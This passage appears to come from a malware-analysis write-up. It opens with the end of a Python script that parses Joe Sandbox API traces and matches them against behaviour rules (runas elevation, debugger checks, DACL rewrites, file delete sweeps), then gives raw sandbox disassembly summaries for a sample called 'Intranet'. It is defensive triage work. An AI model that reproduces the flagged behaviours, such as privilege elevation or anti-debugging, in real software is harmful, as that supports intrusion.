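    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee making this call, None for a direct call


def parse_trace(text: str) -> List[Call]:
    """Turn one block's trace lines into Call records; headings and hash lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = TRACE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                          int(m["sub"], 16) if m["sub"] else None))
    return calls


def api_counts(calls: List[Call], include_subcalls: bool = True) -> Counter:
    """Frequency of each API; subcall entries are the callees' own API usage."""
    return Counter(c.api for c in calls if include_subcalls or c.subcall_of is None)


# (label, APIs that must all appear, argument substring that must appear or None).
# Assumed rule set (this example's own), modelled on the behaviours the report's
# signature list calls out; not Joe Sandbox's signature logic.
RULES = [
    ("runas-launch", {"ShellExecuteW"}, "runas"),
    ("debugger-check", {"IsDebuggerPresent"}, None),
    ("winsta-dacl-rewrite", {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"}, None),
    ("recursive-dir-walk", {"FindFirstFileW", "FindNextFileW", "SetCurrentDirectoryW"}, None),
    ("delete-move-sweep", {"FindFirstFileW", "DeleteFileW", "MoveFileW"}, None),
    ("remote-registry-read", {"RegConnectRegistryW", "RegQueryValueExW"}, None),
]


def match_capabilities(calls: List[Call]) -> List[str]:
    """Labels of every rule satisfied by the block's direct and subcall APIs.
    Argument substrings are searched across the whole block because the sandbox
    attributes stack contents to neighbouring calls ("runas" is listed under
    GetForegroundWindow rather than ShellExecuteW in the trace above)."""
    apis = {c.api for c in calls}
    all_args = " ".join(a for c in calls for a in c.args)
    return [label for label, need, arg in RULES
            if need <= apis and (arg is None or arg in all_args)]


# Sample blocks copied from this report, abridged to the relevant lines.
SAMPLE_WALK = """\
  • Part of subcall function 00504875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00504890
• FindNextFileW.KERNEL32(00000000,?), ref: 0050F7B1
• FindClose.KERNEL32(00000000), ref: 0050F7BC
• FindFirstFileW.KERNEL32(*.*,?), ref: 0050F7D8
• _wcscmp.LIBCMT ref: 0050F7FF
• SetCurrentDirectoryW.KERNEL32(?), ref: 0050F828
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0050F850
"""
SAMPLE_RUNAS = """\
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004B526C
• IsDebuggerPresent.KERNEL32 ref: 004B527E
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00556D10), ref: 004F0BE9
• ShellExecuteW.SHELL32(00000000), ref: 004F0BF0
"""
SAMPLE_DACL = """\
  • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,004F8900,?,?,?), ref: 004F8E3C
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F8931
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F89CF
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F8A81
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F8A95
"""

if __name__ == "__main__":
    for name, block in (("walk", SAMPLE_WALK), ("runas", SAMPLE_RUNAS), ("dacl", SAMPLE_DACL)):
        calls = parse_trace(block)
        print(name, len(calls), "calls", api_counts(calls).most_common(3), match_capabilities(calls))
```

Run as a script it prints, per sample block, the call count, the three most frequent APIs and the matched labels; to triage a whole report, feed each function block's lines to parse_trace and sort functions by the labels they match. Subcall entries are kept in the API set on purpose: in the DACL block the GetUserObjectSecurity call lives in the callee at 004F8E20, and dropping subcalls would hide the pattern.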
                                                                            APIs
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00520B0C
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00520BAB
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00520C43
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00520E82
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00520E8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: a70fc4daf4ff657908e9aea21f8500827aeb19d18b47f0be8e45bf6b759ff52d
                                                                            • Instruction ID: 8b38527eeba2ba884989b9a9a5bb58e69e129cee0dbe8f03107ecefa13786e24
                                                                            • Opcode Fuzzy Hash: a70fc4daf4ff657908e9aea21f8500827aeb19d18b47f0be8e45bf6b759ff52d
                                                                            • Instruction Fuzzy Hash: 3BE15A31204210AFCB14DF25D995E6EBBE8FF8A314F04896DF44ADB2A2DB34E805CB55
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 00504451
                                                                            • __swprintf.LIBCMT ref: 0050445E
                                                                              • Part of subcall function 004C38C8: __woutput_l.LIBCMT ref: 004C3921
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00504488
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00504494
                                                                            • LockResource.KERNEL32(00000000), ref: 005044A1
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 005044C1
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 005044D3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 005044E2
                                                                            • LockResource.KERNEL32(?), ref: 005044EE
                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 0050454F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                            • String ID:
                                                                            • API String ID: 1433390588-0
                                                                            • Opcode ID: 619e4fcc438988d342c5f8e852b45e4582d364170439f118a32930a0117e3837
                                                                            • Instruction ID: 985e5d49aea59f4addf84f8175103cf849fb67fa26abd18dbd3b3fbb28185cb4
                                                                            • Opcode Fuzzy Hash: 619e4fcc438988d342c5f8e852b45e4582d364170439f118a32930a0117e3837
                                                                            • Instruction Fuzzy Hash: 37319EB560121AABDB119FA0ED58EBF7FA8FF14301F044425FA12D2290E774DA24DBA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: 23d6d086c020c4d7bef08b5e3f45caf9036a51038cd60be873dd3065a2372524
                                                                            • Instruction ID: 68335414525c851119ea857f0db3ba52e8149a765be2221dfd1864936c77d0f8
                                                                            • Opcode Fuzzy Hash: 23d6d086c020c4d7bef08b5e3f45caf9036a51038cd60be873dd3065a2372524
                                                                            • Instruction Fuzzy Hash: AE21B735201310AFE701AF25EC59B6E7BA8FF94725F009019F906973A1CB74AD45DF54
                                                                            APIs
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                              • Part of subcall function 00504FEC: GetFileAttributesW.KERNEL32(?,00503BFE), ref: 00504FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00503D96
                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00503E3E
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00503E51
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00503E6E
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00503E90
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00503EAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4002782344-1173974218
                                                                            • Opcode ID: bcfff65fd7f299e1181e6f0759be489b45036af1c02c371e3aaaf499662406f8
                                                                            • Instruction ID: 76e2f427ac0a438f11f11f5c0bb1ad86420dd0333ab082c27d6f236cb7ef3c17
                                                                            • Opcode Fuzzy Hash: bcfff65fd7f299e1181e6f0759be489b45036af1c02c371e3aaaf499662406f8
                                                                            • Instruction Fuzzy Hash: F651617180114D9ACF15EBA1C9A6DEEBB7DAF10304F60426AE442B31E2DB356F0DCB60
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0050FA83
                                                                            • FindClose.KERNEL32(00000000), ref: 0050FB96
                                                                              • Part of subcall function 004A52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,004ABCD4,?,?), ref: 004A52E6
                                                                            • Sleep.KERNEL32(0000000A), ref: 0050FAB3
                                                                            • _wcscmp.LIBCMT ref: 0050FAC7
                                                                            • _wcscmp.LIBCMT ref: 0050FAE2
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 0050FB80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                            • String ID: *.*
                                                                            • API String ID: 2185952417-438819550
                                                                            • Opcode ID: 1dc2f05ff0bba5cfbbaf157236084fb0e25f53667ab2286a43ab43b98db4ab7c
                                                                            • Instruction ID: 1da67dd9638c948a2f53bf776de45256b40f410f9d93b7b1e02ae98c3c03d9a9
                                                                            • Opcode Fuzzy Hash: 1dc2f05ff0bba5cfbbaf157236084fb0e25f53667ab2286a43ab43b98db4ab7c
                                                                            • Instruction Fuzzy Hash: 3141727190021A9FDF25DF64CC69AEEBBB4FF15350F14456AE814A22E1E7349E44CF60
                                                                            APIs
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                              • Part of subcall function 00504FEC: GetFileAttributesW.KERNEL32(?,00503BFE), ref: 00504FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0050407C
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 005040CC
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005040DD
                                                                            • FindClose.KERNEL32(00000000), ref: 005040F4
                                                                            • FindClose.KERNEL32(00000000), ref: 005040FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 05560a70120345da0314a72f1447d4b6739468b0b7dbc1439be2d79ee92b8b5e
                                                                            • Instruction ID: 2178b7e2036fc85af432690aedc41b07a3d3626ba5e3745e53e0aec9fa40598f
                                                                            • Opcode Fuzzy Hash: 05560a70120345da0314a72f1447d4b6739468b0b7dbc1439be2d79ee92b8b5e
                                                                            • Instruction Fuzzy Hash: A23183750083859BC305EF60C8A99EFBBA8BF91304F440E1EF5D1931E1DB249A0DCB66
                                                                            APIs
                                                                              • Part of subcall function 004F9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F93E3
                                                                              • Part of subcall function 004F9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F9410
                                                                              • Part of subcall function 004F9399: GetLastError.KERNEL32 ref: 004F941D
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 005057B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: c69c03ca3822f8edcf004c88a5fd8c9c40a49df5a2df5211a387bb6b383413d1
                                                                            • Instruction ID: 4029f898e38ba7a0cae2f6a36487343382b1ca847ba066f018e04766f4271ce1
                                                                            • Opcode Fuzzy Hash: c69c03ca3822f8edcf004c88a5fd8c9c40a49df5a2df5211a387bb6b383413d1
                                                                            • Instruction Fuzzy Hash: 6D01F731750716EAE73C66649C9ABBF7E5CFB087C0F20042AFD13D60D2FA505C04A964
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 004B5D40
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • GetCurrentProcess.KERNEL32(?,00530A18,00000000,00000000,?), ref: 004B5E07
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 004B5E0E
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004B5E5F
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 004B5E90
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 004B5E9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InfoProcessSystem$CurrentFreeLibraryVersionWow64_memmove
                                                                            • String ID:
                                                                            • API String ID: 551412401-0
                                                                            • Opcode ID: 4602e1b102829b4faa9679e7a13af680398603d9ff38a547d620b86f333e6241
                                                                            • Instruction ID: 101daa5e4654658276f6bd0394f96badc8e8dd61ef3d2e817fec45c43f8d4304
                                                                            • Opcode Fuzzy Hash: 4602e1b102829b4faa9679e7a13af680398603d9ff38a547d620b86f333e6241
                                                                            • Instruction Fuzzy Hash: FC91C131549BC4DECB32CB7884615ABFFE56F2A300B884A5FD0C693B41D628E548D76E
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 004A1DD6
                                                                            • GetSysColor.USER32(0000000F,?,?), ref: 004A1E2A
                                                                            • SetBkColor.GDI32(?,00000000), ref: 004A1E3D
                                                                              • Part of subcall function 004A166C: DefDlgProcW.USER32(?,00000020,?), ref: 004A16B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ColorProc$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 3744519093-0
                                                                            • Opcode ID: 3fc0a11b8e5f1765b23a016ffc7077d008b918c1fd5e71ca4ad08ceace7be38b
                                                                            • Instruction ID: e4097822819dd6567c46df839cff1db91f680fd970556215f0050d286f283ddf
                                                                            • Opcode Fuzzy Hash: 3fc0a11b8e5f1765b23a016ffc7077d008b918c1fd5e71ca4ad08ceace7be38b
                                                                            • Instruction Fuzzy Hash: B2A15B70115514FAE6286B295C99DBF299EEFA7305F15010FF402C63F2CA2CAC02D2BE
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0050C329
                                                                            • _wcscmp.LIBCMT ref: 0050C359
                                                                            • _wcscmp.LIBCMT ref: 0050C36E
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0050C37F
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0050C3AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: 7f60b423fdf068f2bb7592d37963d20f0055128c7b3c2ea36c6302473ca42e0b
                                                                            • Instruction ID: eb788b1a05ac37e1486a4c3c9151bcde4500469f40c9d22282c200e97f13e2d6
                                                                            • Opcode Fuzzy Hash: 7f60b423fdf068f2bb7592d37963d20f0055128c7b3c2ea36c6302473ca42e0b
                                                                            • Instruction Fuzzy Hash: 9E519B356046028FD718DF69C490EAEBBE8FF4A314F108A5EF956873A1DB34AD04CB91
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?,00000001), ref: 00525A02
                                                                            • IsWindowEnabled.USER32(?,?,00000001), ref: 00525A10
                                                                            • GetForegroundWindow.USER32(?,?,00000001), ref: 00525A1D
                                                                            • IsIconic.USER32(?,?,?,00000001), ref: 00525A2B
                                                                            • IsZoomed.USER32(?,?,?,?,00000001), ref: 00525A39
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 5f645c9319f04075b8c5880761c16351b77fdd2022bd1a7d4a53ee2627b294e5
                                                                            • Instruction ID: 822dc8ba76be8a1a4d008656bd3cb882fd5d0b2144a2b45b3a1413f143d4e2aa
                                                                            • Opcode Fuzzy Hash: 5f645c9319f04075b8c5880761c16351b77fdd2022bd1a7d4a53ee2627b294e5
                                                                            • Instruction Fuzzy Hash: 8B110432300A219FE7211F26AC85A2E7F98FF96761B04412AF806D7281EB74D9018AE4
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 225318b986bf3933145fcb1a42e321f0aef46817adf832f924a7c4b3e741f396
                                                                            • Instruction ID: a9a45674728dd1ab178c83a8eed1976f0a8fc205e5f3dac2fc749149d6643bb2
                                                                            • Opcode Fuzzy Hash: 225318b986bf3933145fcb1a42e321f0aef46817adf832f924a7c4b3e741f396
                                                                            • Instruction Fuzzy Hash: 2BD01271804148EAC7549B92EC54EFA77BCEB08306F504057F556A2040D27D97CDAB3B
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0050416D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0050417B
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0050419B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00504245
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
